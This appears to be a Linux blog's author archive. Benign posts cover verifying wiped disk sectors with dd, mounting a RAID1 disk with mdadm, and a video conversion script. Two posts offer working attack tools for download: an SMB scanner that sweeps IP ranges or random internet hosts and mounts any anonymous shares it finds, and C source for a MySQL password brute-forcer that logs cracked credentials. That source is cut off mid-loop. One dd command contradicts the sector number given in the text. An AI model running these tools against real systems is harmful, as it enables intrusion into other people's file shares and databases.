Author archive: daniel

verify (read and write) sectors on a hard disk (for example after a wipe)

Hello,

in the last few days I wiped a hard disk with nwipe.
Now I want to check whether the sectors were correctly overwritten with random data, or better, by the blanking pass at the end.

To do that I used:

root@host:~$ dd if=/dev/sda of=testSector count=1 bs=512 skip=848234
root@host:~$ ls -lah testSector 
-rw-r--r-- 1 root root 512 Mai 9 20:51 testSector

where 848234 is the sector number in this example.

The result is:

root@host:~$ cat testSector | od -o
0000000 000000 000000 000000 000000 000000 000000 000000 000000
*
0001000

That means the disk has been successfully blanked at that sector 😉

Hint: to write random data to this sector you can use the seek option:

dd if=/dev/urandom of=/dev/sda  count=1 bs=512 seek=848234
root@host:~$ dd if=/dev/urandom of=/dev/sda count=1 bs=512 seek=84234
1+0 Datensätze ein
1+0 Datensätze aus
512 bytes copied, 0,000171533 s, 3,0 MB/s
root@host:~$ dd if=/dev/sda of=testSector count=1 bs=512 skip=848234
root@host:~$ cat testSector | od -o
0000000 152264 101766 076373 004631 135374 176667 050103 073263
0000020 003573 113101 054520 134473 050305 161767 062320 122631
0000040 112241 040731 164452 151325 110756 103712 122175 007127
0000060 106677 111246 151736 134123 070055 071502 127052 006733
0000100 016462 140063 106340 075113 135236 040731 070540 050634
0000120 120725 012544 137356 004304 135025 077212 037105 063232
0000140 017500 020745 164012 066752 117227 034401 102106 002367
0000160 043327 102742 100723 021743 104661 175100 167331 121240
0000200 161230 165423 021265 031457 053316 140015 007725 136412
0000220 100223 067136 166016 042721 046442 002012 121731 024135
0000240 044776 050324 126152 127215 057712 041523 113266 024335
0000260 016362 000614 135326 162237 055575 117146 014014 116267
0000300 004072 173014 122470 135151 122400 041037 100437 151255
0000320 162432 103334 023300 074714 056124 016406 007221 032507
0000340 121605 047133 027122 030424 137170 123053 103476 161352
0000360 063070 052450 111541 022277 015016 113155 027252 147123
0000400 131134 031073 117501 126474 047361 041560 013720 073711
0000420 024352 117055 016246 054663 172336 036371 027345 020214
0000440 160543 152253 010601 115263 176535 106513 112731 150711
0000460 146652 032205 156223 173052 070052 120633 160266 057257
0000500 175317 177705 063171 004156 075675 115245 072707 165572
0000520 011106 075707 062765 035245 042650 121131 036537 110032
0000540 077717 112056 160525 132765 054451 033665 116436 003052
0000560 030666 137100 072461 047316 034617 176217 013447 012607
0000600 006055 010351 010703 010537 050256 132356 147016 016417
0000620 017170 015713 035343 026253 047034 036250 165207 107541
0000640 005664 044402 073542 051567 060003 044253 152435 063107
0000660 033037 101026 012541 130057 021666 124712 106530 065053
0000700 026762 166473 122303 140272 054466 135251 107330 142724
0000720 075672 047672 003550 136406 100752 004503 013000 074173
0000740 160230 167304 126156 043055 042616 035035 127507 170670
0000760 167460 155627 013361 033221 101157 100050 130744 112503
0001000
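As an added example (not from the original post), the same check done from Python over a whole device or image instead of one dd read: every 512-byte sector is classified as blank (what the blanking pass leaves), random (what a random pass leaves) or data (the wipe missed it), and a read past the end of the device is reported as an error instead of being mistaken for a blank sector. The image and its contents are constructed here; point scan_image() at /dev/sdX or a dd image to use it for real.

```python
import hashlib
import math
import os
import tempfile
from collections import Counter

SECTOR_SIZE = 512  # logical sector size, same as bs=512 in the dd commands above


def read_sector(path, sector, sector_size=SECTOR_SIZE):
    """Read one sector, like `dd bs=512 count=1 skip=<sector>`. A short read
    (sector past the end of the device or image) is an error, not 'blank'."""
    with open(path, "rb") as fh:
        fh.seek(sector * sector_size)
        data = fh.read(sector_size)
    if len(data) != sector_size:
        raise ValueError(f"sector {sector}: only {len(data)} of {sector_size} bytes readable")
    return data


def entropy_bits(data):
    """Shannon entropy in bits per byte: 0 for all zeros, about 7.6 for 512 random bytes."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def classify_sector(data, random_threshold=6.0):
    """'blank'  = every byte is 0x00 (what the blanking pass leaves behind)
       'random' = high entropy (what a random pass leaves behind)
       'data'   = anything else, i.e. the wipe missed this sector"""
    if not any(data):
        return "blank"
    if entropy_bits(data) >= random_threshold:
        return "random"
    return "data"


def scan_image(path, sector_size=SECTOR_SIZE):
    """Classify every full sector of a device or image file; returns
    {'blank': [...], 'random': [...], 'data': [...]} with sector numbers."""
    result = {"blank": [], "random": [], "data": []}
    with open(path, "rb") as fh:
        # seek to the end instead of os.path.getsize(): for a block device
        # such as /dev/sda, getsize() reports 0 while seek() returns the size
        total = fh.seek(0, os.SEEK_END) // sector_size
        fh.seek(0)
        for sector in range(total):
            result[classify_sector(fh.read(sector_size))].append(sector)
    return result


def build_sample_image(path=None, sectors=16):
    """Constructed test image (not a real disk): all zeros except sector 3,
    which holds SHA-256 output standing in for a random pass, and sector 5,
    which holds text that a wipe would have missed."""
    if path is None:
        path = os.path.join(tempfile.mkdtemp(), "wiped.img")
    random_like = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(16))
    text = (b"secret payroll.csv;alice;4711\n" * 20)[:SECTOR_SIZE]
    with open(path, "wb") as fh:
        for sector in range(sectors):
            fh.write({3: random_like, 5: text}.get(sector, bytes(SECTOR_SIZE)))
    return path


if __name__ == "__main__":
    img = build_sample_image()
    # sector 0 reads as blank, the same verdict the od -o dump above gives
    print("sector 0:", classify_sector(read_sector(img, 0)))
    for kind, numbers in scan_image(img).items():
        print(f"{kind:6s} {len(numbers):3d} sector(s) {numbers[:8]}")
```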

 

 

Rescue RAID data / mount RAID disks

Today I want to access/mount a single disk of my WDCloud Mirror Gen2 RAID1 on my Linux machine.

I tried to mount it (first I figured out the partition with gparted):

root@pc:~# mkdir -p /media/nfsdisk 
root@pc:~# mount /dev/sdb2 /media/
mount: unknown filesystem type 'linux_raid_member'
Medium /dev/sda: 5,5 TiB, 6001175126016 Bytes, 11721045168 Sektoren
Einheiten: sectors von 1 * 512 = 512 Bytes
Sektorengröße (logisch/physisch): 512 Bytes / 4096 Bytes
I/O Größe (minimal/optimal): 4096 Bytes / 4096 Bytes
Typ der Medienbezeichnung: gpt
Medienkennung: 830CEC50-A486-4BBB-82F9-F61FAB8C98F4

Gerät Start Ende Sektoren Größe Typ
/dev/sda1 2048 4196351 4194304 2G Microsoft basic data
/dev/sda2 6293504 11718945899 11712652396 5,5T Microsoft basic data
/dev/sda3 11718946816 11721045134 2098319 1G Microsoft basic data
/dev/sda4 4196352 6293503 2097152 1G Microsoft basic data

Die Einträge der Partitionstabelle stimmen nicht mit der Reihenfolge der Medien überein.

Examine /dev/sdb2:

root@pc:~# mdadm --examine /dev/sdb2
/dev/sdb2:
          Magic : c54a7cba
        Version : 1.0
    Feature Map : 0x1
     Array UUID : 4151f8f8:4151f8f8:4151f8f8:4151f8f8
           Name : 1
  Creation Time : Thu Nov 19 12:21:47 2015
     Raid Level : raid1
   Raid Devices : 2

 Avail Dev Size : 5852141296 (2790.52 GiB 2996.30 GB)
     Array Size : 2926070648 (2790.52 GiB 2996.30 GB)
   Super Offset : 5852141552 sectors
          State : clean
    Device UUID : 22f64ef8:4151f8f8:413abe12:34ac24a6

Internal Bitmap : 2 sectors from superblock
    Update Time : Mon Jul 18 20:57:32 2016
       Checksum : 11e885b1 - correct
         Events : 226


   Device Role : Active device 0
   Array State : A. ('A' == active, '.' == missing)

 

 

I tried to assemble and start the array with:

root@pc:~# mdadm -A -R /dev/md1 /dev/sdb2
mdadm: /dev/sdb2 is busy - skipping

but it did not work because /dev/sdb2 was still busy, an array was already assembled on it; after stopping /dev/md1 and assembling again it worked:

root@pc:~# mdadm --stop /dev/md1
mdadm: stopped /dev/md1
root@pc:~# mdadm -A -R /dev/md1 /dev/sdb2
mdadm: /dev/md1 has been started with 1 drive (out of 2).
root@pc:~# mount /dev/md1 /media/nfsdisk
root@pc:~# lsblk
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
sda 8:0 0 1,8T 0 disk 
├─sda1 8:1 0 931,4G 0 part 
├─sda2 8:2 0 2,8G 0 part [SWAP]
└─sda3 8:3 0 928,7G 0 part /home
sdb 8:16 0 2,7T 0 disk 
├─sdb1 8:17 0 2G 0 part 
├─sdb2 8:18 0 2,7T 0 part 
│ └─md1 9:1 0 2,7T 0 raid1 /media/nfsdisk
├─sdb3 8:19 0 1G 0 part 
└─sdb4 8:20 0 1G 0 part 
sdc 8:32 0 1,8T 0 disk 
└─sdc1 8:33 0 1,8T 0 part 
sdd 8:48 0 111,8G 0 disk 
└─sdd1 8:49 0 111,8G 0 part /
sde 8:64 0 119,2G 0 disk 
└─sde1 8:65 0 119,2G 0 part 
sr0 11:0 1 4,2G 0 rom
root@pc:~# mount | grep md1
/dev/md1 on /media/nfsdisk type ext4 (rw)

One more hint at the end: let mdadm find and assemble the arrays itself:

root@pc:~# mdadm --assemble --scan

video 2 mp4 converter

I created a new script for video-to-mp4 conversion.

Features:

* keeps metadata
* keeps the creation date
* deletes the larger of the two files if you want

#!/bin/bash
#
# converter for video files to mp4
# this script also deletes the larger of the two files if you want
# please take care with DELETE_FILES="yes"
# double check the output first, whether the quality is good enough for you
# this script keeps metadata and the creation date of the file
#
# written 2016/07/17 by Daniel Gohlke to clean up my NAS
#
# you need ffmpeg and some codecs, if i forgot something please update this script
# sudo apt-get install libavcodec-extra-53 libavutil-extra-51 libavformat-extra-53 libx264-146 ffmpeg
# change whatever you need

EXTENSION_NEW="mp4"
DELETE_FILES="no"
DEFAULT_CRF="22" # some kind of medium
OUTPUT_DIR="output"

read -p "Please enter CRF quality / higher value is lower quality [51 worst .. 0 lossless (default $DEFAULT_CRF)]: " CRF
CRF=${CRF:-$DEFAULT_CRF}
echo "convert with CRF $CRF"


# error handling: remove the half-written output file, never the source file
function finish {
  if [ -n "$FILENAME" ]; then
    echo "some error occurred, cleanup file $OUTPUT_DIR/$FILENAME.$EXTENSION_NEW"
    echo "Error on line $1"
    rm -f "$OUTPUT_DIR/$FILENAME.$EXTENSION_NEW"
  else
    echo "User break, leave $d untouched"
  fi
  rm -f "$OUTPUT_DIR/filelist.txt"
}

# Trap if something failed
trap 'finish $LINENO' ERR
#trap 'finish $LINENO' EXIT


function start_convert {

  mkdir -p "$OUTPUT_DIR"
  # one path per line; only the output directory itself is skipped
  find . -type f \( ! -iname "filelist.txt" \) | grep -v "^\./$OUTPUT_DIR/" > "$OUTPUT_DIR/filelist.txt"
  # read line by line so that paths with spaces survive
  while IFS= read -r d; do
    echo "converting with crf $CRF $d"
    FILENAME=$(basename "$d")
    EXTENSION="${FILENAME##*.}"
    FILENAME="${FILENAME%.*}"

    # convert; -nostdin keeps ffmpeg from eating the file list on stdin
    ffmpeg -nostdin -stats -i "$d" -c:v h264 -strict experimental -crf "$CRF" -map_metadata 0 "$OUTPUT_DIR/$FILENAME.$EXTENSION_NEW"

    # apply the source file's timestamps to the new file
    touch -r "$d" "$OUTPUT_DIR/$FILENAME.$EXTENSION_NEW"
    FILESIZE_OLD=$(stat -c%s "$d")
    FILESIZE_NEW=$(stat -c%s "$OUTPUT_DIR/$FILENAME.$EXTENSION_NEW")
#    echo $FILESIZE_OLD
#    echo $FILESIZE_NEW

    if [ "$DELETE_FILES" == "yes" ]; then
      echo "delete greater files is turned on"

      if [ "$FILESIZE_OLD" -ge "$FILESIZE_NEW" ]; then
        echo "delete $d"
        rm -f "$d"
      else
        echo "delete $OUTPUT_DIR/$FILENAME.$EXTENSION_NEW"
        rm -f "$OUTPUT_DIR/$FILENAME.$EXTENSION_NEW"
      fi

    else
      echo "delete greater files is turned off"
    fi

  done < "$OUTPUT_DIR/filelist.txt"

  rm -f "$OUTPUT_DIR/filelist.txt"
  exit 0
}

#ffmpeg -stats -i 0621232021DVB-TDasErste.m4v -c:v h264 -strict experimental -crf 20 -map_metadata 0  FILENAMEdefaultcrf20.mp4

# Start Program
read -p "Do you wish to start converting your videos? (y/n) " yn
case $yn in
  [Yy]* ) start_convert;;
  [Nn]* ) exit;;
   * ) echo "Please answer yes(y) or no(n).";;
esac

 

Link to GitHub: https://github.com/danielgohlke/scripts/blob/master/converttomp4.sh

SMBScan version 1.2

Simple SMB scanner written in Bash for Linux, for newer systems with zmap support
smbscan-1.2.tar.gz
(Download all) for new systems (2015) with zmap and so on
– added zmap support
– replaced smbmount with mount
– removed dialog and whiptail

#!/bin/bash
# This script scans smb servers a given network
# and mounts anonymous shared directories
# example: ./smbscan.sh or ./smbscan iprange
# http://www.bastardo.de/ 

# clean old temp files
rm -f *.out

if [ `id -u` -ne 0 ]; then
  echo "You must be root to use this script."
  exit 1
fi

FILESYSTEM=cifs
MNT=/bin/mount
SMBC=/usr/bin/smbclient
NMBL=/usr/bin/nmblookup
NMAP=/usr/bin/nmap
GREP=/bin/grep
SED=/bin/sed
ZMAP=/usr/sbin/zmap
CHARSET="iso8859-1"
TIMEOUT=2
usage() { echo "Usage: $0 [-z number of hosts (zmap)] [-n ip/range (nmap)]" 1>&2; exit 1; }

while getopts "n:z:" opt; do
  case "$opt" in
    n)
      echo "using nmap with ${OPTARG}" >&2
      NMAPSCAN=1
      test -x $NMAP || { echo -e 'nmap not found !';exit 1; }
      IP=${OPTARG}
      ;;
    
    z)
      echo "using zmap with ${OPTARG} hosts" >&2
      ZMAPSCAN=1
      test -x $ZMAP || { echo -e 'zmap not found !';exit 1; }
      z=${OPTARG}
      ;;
    h)
      echo "Invalid option: -$OPTARG" >&2
      usage
      ;;
    *)
      echo "Option -$OPTARG requires an argument. " >&2
      usage
      exit 1
      ;;
  esac

done

if [ -z $ZMAPSCAN ] && [ -z $NMAPSCAN ]; then
   usage
fi

shift $((OPTIND-1))


test -x $MNT || { echo -e 'mount not found !';exit 1; }
test -x $SMBC || { echo -e 'smbclient not found !';exit 1; }
test -x $NMBL || { echo -e 'nmblookup not found !';exit 1; }
test -x $GREP || { echo -e 'grep not found !';exit 1; }
test -x $SED || { echo -e 'sed not found !';exit 1; }


function check_it(){
SUM=0
X=`cat ./out | wc -c`
SUM=`expr $SUM + $X`
}
        echo "Written by cd ;)"
        echo "Scan started against to $1 on port 139"
        echo "This can take a while"


if [ "$NMAPSCAN" = 1 ] 
    then
          echo "search via nmap at ip/range ${n} for hosts who has opened port 139"
      $NMAP -p 139 -PN -T 5 -sT -v -v $IP  -oG ./$IP.out | $GREP Host
      cat ./$IP.out | $GREP "139/open" | cut '-d ' -f 2 > ./out
else
          echo "search via zmap for ${z} hosts who has opened port 139"
      $ZMAP -N ${z} -p 139 -B 1M -q -o ./out 
          sed -i '1d' ./out #delete first line "saddr" for csv
fi
shift $((OPTIND-1))

    
rm -f ./$IP.out
check_it

if [ $SUM = 0 ]
    then 
    echo "Sorry
    No SMB Server found !
        
      Thanks for use ... "
   rm -f ./out
   exit 1
fi

    echo "Please wait...
      Searching 4 Shared Directories"
while read host ;
    do
    # Get Computer name
    echo "Try $host..."
        echo "Searching Name via nmblookup (B)"
    name=`$NMBL -A $host | $GREP "<00> -         B <ACTIVE>" | awk '{print $1}'`

    # Get Workgroup name
    workgroup=`$NMBL -A $host | $GREP "<00> - <GROUP>" | awk '{print $1}'`

    # if name not set so use this one
    workgroup=${workgroup:=WORKGROUP}

    name=${name:=IG_IT_IG_IT}

if [ $name = "IG_IT_IG_IT" ]
    then
    echo "Searching name via nmblookup (M)"
    name=`$NMBL -A $host | $GREP "<00> -         M <ACTIVE>" | awk '{print $1}'`
    fi 
    name=${name:=NONAME}

if [ $name = "NONAME" ]
    then
    echo "Searching Name via nmblookup (H)"
    name=`$NMBL -A $host | $GREP "<00> -         H <ACTIVE>" | awk '{print $1}'`
    fi
    name=${name:=NO_NAME}

if [ $name = "NO_NAME" ]
    then
    echo "Searching Name via Smbclient ... using Servername"
    name=`$SMBC -N -L $host -g | grep Server | awk {'print $1'} | cut -d '|' -f 2`
    fi
    name=${name:=NAME_NOT_FOUND}


    
    # search for shared folders
    echo "looking for shared directorys on $host"
    # kill old sleep process
    kill -9 `pidof sleep` 2&>1
    $SMBC -W "$workgroup" -n "fuckup" -N  -L $host -g -p 139 | grep Disk | cut -f 2 -d '|'  > ./$host.shares 
        # set Timeout to kill connections that take to long 10 sec is ok i think
    sleep $TIMEOUT || kill -9 `pidof $SMBC` 2&>1
        
        exist=0
        while read LIST ;
                do
            exist=1
            #make directory for the shares
            mkdir -p ./"$name-$host/$LIST"
            #add a logfile
            #touch ./"$name-$host/ip-is-$host"
                    $MNT -t cifs -o guest,iocharset=utf8,_netdev //$host/$LIST ./$name-$host/$LIST
                    $MNT -t cifs -o user=nobody,iocharset=utf8,_netdev //$host/$LIST ./$name-$host/$LIST
                    $MNT -t nfs $host:/$LIST ./$name-$host/$LIST


        echo "trying to mount //$host/$LIST into ./$name-$host/$LIST"
        if [ $exist = 1 ]
        then
            #write some useful or not very useful informations into a log 
            echo " 
            $name - $host
            Last found: `date`
            Mapped    : `df -h | grep $host`" >> ./"$name-$host/ip-is-$host" 
        fi
        done < ./$host.shares

rm -f ./$host.shares
done < ./out

mount | $GREP $FILESYSTEM > ./mounts
    echo "
SMBScan v 1.2 -> listing mounted smb file systems

`cat ./mounts | more`
"
rm -f ./mounts
rm -f ./out

umountall.sh

#!/bin/sh
#get forced
echo "unmounting smb file systems (force)"
umount -f */*

Samba / Netbios network scanner (SMBScan) for Linux

Simple SMB scanner written in Bash for Linux, for older systems

smbscan-1.1.tar (Download all) for older systems (anno 2006)

smbscan.sh

#!/bin/bash
# This script scans smb servers a given network
# and mounts anonymous shared directories
# example: ./smbscan.sh or ./smbscan iprange
# http://www.bastardo.de/ 

# clean old temp files
#rm -f *.out

if [ `id -u` -ne 0 ]; then
  echo "You must be root to use this script."
  exit 1
fi

FILESYSTEM=cifs
SMBM=/usr/bin/smbmount
SMBC=/usr/bin/smbclient
NMBL=/usr/bin/nmblookup
NMAP=/usr/bin/nmap
GREP=/bin/grep
SED=/bin/sed
DIALOG=/usr/bin/dialog
#WHIP=/usr/bin/whiptail
CHARSET="iso8859-1"
# BUNT 1 = Console
# BUNT 0 = with Whiptail or dialog graphics
BUNT=1
TIMEOUT=5

#test -x $WHIP
test -x $DIALOG && DIALOG=$DIALOG
#test -x $WHIP || BUNT=0
test -x $SMBM || { echo -e 'smbmount not found !';exit 1; }
test -x $SMBC || { echo -e 'smbclient not found !';exit 1; }
test -x $NMBL || { echo -e 'nmblookup not found !';exit 1; }
test -x $NMAP || { echo -e 'nmap not found !';exit 1; }
test -x $GREP || { echo -e 'grep not found !';exit 1; }
test -x $SED || { echo -e 'sed not found !';exit 1; }
# hehe i know that suxx ;)
clear

function script_kiddie() {
if [ $BUNT -eq 1 ]
then
    echo "ScR1p7k1dDi3 Pr0t3c7 Sy5t3m v 1.1"
	else
	    $DIALOG --title "v 1.1" --infobox " ScR1p7k1dDi3 Pr0t3c7 Sy5t3m" 6 20
fi
exit 1 
}
script_kiddie

if [ $# -eq 1 ]
then
    echo "$1" > ./out
        else
	    $DIALOG --title "SMBscan v.1.1" --inputbox "                Written by cd ;)

Please enter IP range
e.g 10.0.0.1-24 or 10.0.1-255.5-30
or type ./smbscan 10.0.0.1-254

http://www.bastardo.de <- get newest version" 13 50 2> ./out
fi

function check_it(){
SUM=0
X=`cat ./out | wc -c`
SUM=`expr $SUM + $X`
}
if [ $BUNT -eq 1 ]
    then
#	test -e $1 || { echo -e "$0 [ip room]"; exit 1; }
	    echo "Written by cd ;)"
	    echo "Scan started against to $1 on port 139"
	    echo "This can take a while"
fi

check_it
IP=`cat ./out`
rm -f ./out
# i think that is the fastest, we whant to scan only 1 port ... not more 
$NMAP -p 139 -PN -T 5 -sT -v -v $IP  -oG ./$IP.out | $GREP Host
cat ./$IP.out | $GREP "139/open" | cut '-d ' -f 2 > ./out
rm -f ./$IP.out
check_it
if [ $SUM = 0 ]
    then 
	if [ $BUNT -eq 1 ]
	    then
echo "
    No SMB Server found.

      Thanks for use ..."
		rm -f ./out
		exit 1
		    else
			$DIALOG --title "Sorry" --infobox "
    No SMB Server found !

      Thanks for use ... " 7 30
			rm -f ./out
			exit 1
	fi
fi

if [ $BUNT -eq 1 ]
    then
	echo "Please wait...
      Searching 4 Shared Directories"
	else
	    $DIALOG --infobox "Please wait !
Searching 4 Shared Directories..." 5 40
fi
while read host ;
    do
	# Get Computer name
	echo "Try $host..."
        echo "Searching Name via nmblookup (B)"
	name=`$NMBL -A $host | $GREP "<00> -         B <ACTIVE>" | awk '{print $1}'`

	# Get Workgroup name
	workgroup=`$NMBL -A $host | $GREP "<00> - <GROUP>" | awk '{print $1}'`

	# if name not set so use this one
	workgroup=${workgroup:=WORKGROUP}

	name=${name:=IG_IT_IG_IT}

if [ $name = "IG_IT_IG_IT" ]
    then
	echo "Searching name via nmblookup (M)"
	name=`$NMBL -A $host | $GREP "<00> -         M <ACTIVE>" | awk '{print $1}'`
    fi 
    name=${name:=NONAME}

if [ $name = "NONAME" ]
    then
	echo "Searching Name via nmblookup (H)"
	name=`$NMBL -A $host | $GREP "<00> -         H <ACTIVE>" | awk '{print $1}'`
    fi
    name=${name:=NO_NAME}

if [ $name = "NO_NAME" ]
    then
	echo "Searching Name via Smbclient ... using Servername"
	name=`$SMBC -N -L $host -g | grep Server | awk {'print $1'} | cut -d '|' -f 2`
    fi
    name=${name:=NAME_NOT_FOUND}

	# search for shared folders
	echo "looking for shared directorys on $host"
	# kill old sleep process
	kill -9 `pidof sleep` 2&>1
	$SMBC -W "$workgroup" -n "fuckup" -N  -L $host -g -p 139 | grep Disk | cut -f 2 -d '|'  > ./$host.shares 
        # set Timeout to kill connections that take to long 10 sec is ok i think
	sleep $TIMEOUT || kill -9 `pidof $SMBC` 2&>1

	    exist=0
	    while read LIST ;
	    		do
		    exist=1
		    #make directory for the shares
		    mkdir -p ./"$name-$host/$LIST"
		    #add a logfile
		    #touch ./"$name-$host/ip-is-$host"
		    $SMBM "//$host/$LIST" "./$name-$host/$LIST" -o defaults,guest,iocharset=utf8

			if [ $BUNT -eq 1 ]
			    then
				echo "trying to mount //$host/$LIST into ./$name-$host/$LIST"
			    else
				$DIALOG --infobox  "trying to mount //$host/$LIST into ./$name/$LIST" 10 60
			fi
		if [ $exist = 1 ]
		then
		    #write some useful or not very useful informations into a log 
		    echo " 
		    $name - $host
		    Last found: `date`
		    Mapped    : `df -h | grep $host`" >> ./"$name-$host/ip-is-$host" 
		fi
	    done < ./$host.shares
#	    echo `mount | $GREP cifs | grep $host` >> ./"$name-$host/ip-is-$host"

rm -f ./$host.shares
done < ./out

mount | $GREP $FILESYSTEM > ./mounts
if [ $BUNT -eq 1 ]
    then
	echo "
SMBScan v 1.1 -> listing mounted smb file systems

`cat ./mounts | more`
"
    else
	$DIALOG --title "SMBScan v 1.1 -> listing mounted smb file systems" --textbox mounts 10 60
fi
rm -f ./mounts
rm -f ./out

 

The unmount script

umount.sh

#!/bin/sh
#get forced
echo "unmounting smb file systems (force)"
umount */*/*
#umount `mount | grep smbfs | awk '{print $3}'`
kill -9 `ps aux | grep mount.cifs | awk '{print $2}'`

 

The Makefile for "make install"

PREFIX=/usr/sbin/
install:
	@cp smbscan.sh $(PREFIX)
	@cp umountall.sh $(PREFIX)

uninstall:
	@rm $(PREFIX)smbscan.sh
	@rm $(PREFIX)umountall.sh

 

 

MySQL Bruteforce for Linux and Windows

Linux source and binaries

mysql-bruteforce.c (source code)
mysql-bruteforce.tar (source code tarball)
mysql-bruteforce-binary-only.tar (compiled binary)
You need to install ncurses:

apt-get install libncurses5-dev libncurses5

Windows source and binaries

mysql-bruteforce-win32.tar (source code tarball)
pdcurses.dll (PDCurses.dll)
libmySQL.dll (libmySQL.dll)
mysql-bruteforce-win32.c (source code for Windows)

Here is the source (Linux):

#include <stdio.h>
#include <mysql/mysql.h>
#include <curses.h>
#include <string.h>
#include <stdlib.h>

// German or English
#define GER 1
#define ENG 0
/*
**************************************************************************************************
*  MySQL brute-force program, written out of pure boredom
*   23.03 2010 by cd
*
*   gcc mysql-bruteforce.c -o mysql-bruteforce -lmysqlclient -lncurses -O2 -Wall
*   or -O6 instead of -O2
*  ./mysql-bruteforce user host passwordlist <optional length of the password>
*  log file is "mysql-bruteforce.log"
*
**************************************************************************************************
**************************************************************************************************
*
*  for people who do not understand German: change the #define ENG to 1 and GER to 0
*
*  compile with: gcc mysql-bruteforce.c -o mysql-bruteforce -lmysqlclient -lncurses -O3 -Wall
*  or -O6 instead of -O2
*  usage: ./mysql-bruteforce user host <password list> <optional len of password>
*  log file is "mysql-bruteforce.log"
*
**************************************************************************************************
*
*   Newest version http://bruteforce.at/mysql
*
*   Think about the good old times, MoD
*   If you want to survive out here, you've got to know where your towel is.
*/

MYSQL *my;

int count=0;
char *passwd;

#define STARTCHR 46 // 33 set start ascii char
#define ENDCHR 122  // 127 set end ascii char
#define BUFF_SIZE 1024
#define LEN 80

char buffer[BUFF_SIZE];
int jump=0;

int main (int argc, char *argv[])
{
if (argc <= 3 )
    {
#if ENG && !GER
    printf("\n"
    "\n   MySQL Bruteforce, written by cd\n\n"
    "    via wordlist\n"
    "    %s root localhost wordlist       # use complete wordlist\n"
    "    %s root 127.0.0.1 ../wordlist 7  # serch only words with 7 chars\n"
    "\n"
    "    standard bruteforce\n"
    "    %s root localhost -b      # Bruteforce Method (standard up to 8 chars)\n"
    "    %s root 127.0.0.1 -b 12   # up to 12 chars\n"
    "    %s root host -b 12 Test   # start with the given Word\n\n\n\n\n",argv[0],argv[0],argv[0],argv[0],argv[0]);
#else
    printf("\n"
    "\n   MySQL Bruteforce, geschrieben von cd\n\n"
    "    via Wörterliste\n"
    "    %s root localhost wordlist       # Gesamte Wörterliste durchsuchen\n"
    "    %s root 127.0.0.1 ../wordlist 7  # suche nur Wörter mit 7 Buchstaben\n"
    "\n"
    "    Standard Bruteforce\n"
    "    %s root localhost -b      # Bruteforce Methode (standard bis zu 8 Buchstaben)\n"
    "    %s root 127.0.0.1 -b 12   # bis zu 12 Buchstaben\n"
    "    %s root host -b 12 Test   # Startet mit angegebenen Wort\n\n\n\n\n",argv[0],argv[0],argv[0],argv[0],argv[0]);
#endif
    return 0;
    }

if(strcmp(argv[3],"-b")) 
    {
	jump=0;
    } else jump=1;

    initscr();
    printw("\n#################################\n#\tMYSQL Bruteforce\t#\n#\t2010 by cd\t\t#\n#################################\n\n\t\n");
    refresh();

    char host[20];
    char user[20];
    my = mysql_init(NULL);
    FILE *pass_list,*logfile;

if( ( pass_list=fopen(argv[3],"r") ) == NULL && jump!=1 ) 
{
#if ENG && !GER
fprintf(stderr,"Cannot open File \"%s\"\n", argv[3]);
#else
fprintf(stderr,"Kann Datei \"%s\" nicht oeffnen.\n", argv[3]);
#endif
endwin();
return 0;
}

if( ( logfile=fopen("mysql-bruteforce.log","a+") ) == NULL )
{
#if ENG && !GER
fprintf(stderr,"Cannot open File \"%s\"\n", argv[3]);
#else
fprintf(stderr,"Kann Datei \"%s\" nicht oeffnen.\n", argv[3]);
#endif
endwin();
return 0;
}

    if(my == NULL)
	{
#if ENG && !GER
	    fprintf(stderr, "Initialization failed\n");
#else
	    fprintf(stderr, "Initialisierung fehlgeschlagen\n");
#endif
	    endwin();
	    return 0;
	}

sprintf(user, "%s", argv[1]);
sprintf(host, "%s", argv[2]);

char eingabe;

#if ENG && !GER
mvprintw(5,2,"User: %s Host: %s ",user,host);
#else
mvprintw(5,2,"Benutzer: %s Server: %s ",user,host);
#endif

if (jump==1)
{
refresh();
eingabe='b';

}
else {eingabe='w';}

switch(eingabe)
{
case 'b':
while(1)
{
    int min=1,max;
    if (argc<=4)
	{
	    max=8;
	}
	    else 
	    {
		max=atoi(argv[4]); 
	    }

    char *pass=(char*)malloc(min);
    int pos,x,found; 

	    pass[min]='\0';

    if (argc>=6)
	{ 
	    min=strlen(argv[5]);
	    pass=argv[5];
	    pass[min+1]='\0';
	    pos=min;
	    if (atoi(argv[4])!=strlen(argv[5]))
		{
#if ENG && !GER
		 mvprintw(7,0,"len of word must be the same the digit after -b\n"
		 "like: %s root localhost -b 4 abcd\n",argv[0]);
#else
		 mvprintw(7,0,"länge des Wortes muss die gleiche seien wie die zahl nach -b\n"
		 "z.B: %s root localhost -b 4 abcd\n",argv[0]);
#endif
		 refresh();
		 endwin();
		 return 0;
		 }

	}

    for(x=min;x<=max;x++)
	{
	    if(x>min)
		{
		    if (realloc(pass, x)) 
			{
			    memset(pass, STARTCHR, x);
			    pass[x]='\0';
			} else {
				    mvprintw(13,1,"error in realloc");
				    endwin(); 
				    return 1;
				}
		}
	    while(pass[0]<ENDCHR)
		{
		    found=0;
		    if( mysql_real_connect (my,host,user,pass,NULL,0,NULL,0)  == NULL)
			{
			    move(6,2);
			    deleteln();
			    mvprintw(6,2,"Pass: %s",pass);
			    refresh();
			}
			else
			    {
				move(6,2);
				deleteln();
				mvprintw(6,2,"Pass: %s",pass);
				refresh();
#if ENG && !GER
				mvprintw(8,2,"Login Success:\t %s:%s@%s\n",user,pass,host);
#else
				mvprintw(8,2,"Login Erfolgreich:\t %s:%s@%s\n",user,pass,host);
#endif
				refresh();
				endwin();
				mysql_close(my);
				fprintf(logfile,"%s:%s@%s\r\n",user,pass,host);
				return 0;
			    }

		    for(pos=x-1;pos!=0;pos--)
			{
			    if(pass[pos]==ENDCHR)
				{
				    memset(pass+pos, STARTCHR, strlen(pass)-pos);
				    pass[pos-1]++;
				    found=1;
				    break;
				}
			}

		    if(!found)
			pass[x-1]++;
			count++;
		}
	}

    move(6,2);
    deleteln();
#if ENG && !GER
    mvprintw(8,2,"Password not found for %s@%s :/",user,host);
#else
    mvprintw(8,2,"Passwort fuer %s@%s nicht gefunden :/",user,host);
#endif
    refresh();
    endwin();
    mysql_close (my);
    return 0;
}
break;
}

int dummy;
while((fscanf(pass_list, "%s\r\n", buffer))!=EOF)
{
    if (argv[4])
	{
	    if (strlen(buffer)!=atoi(argv[4])) goto next; // blubb goto i know ^^ phuu
	}

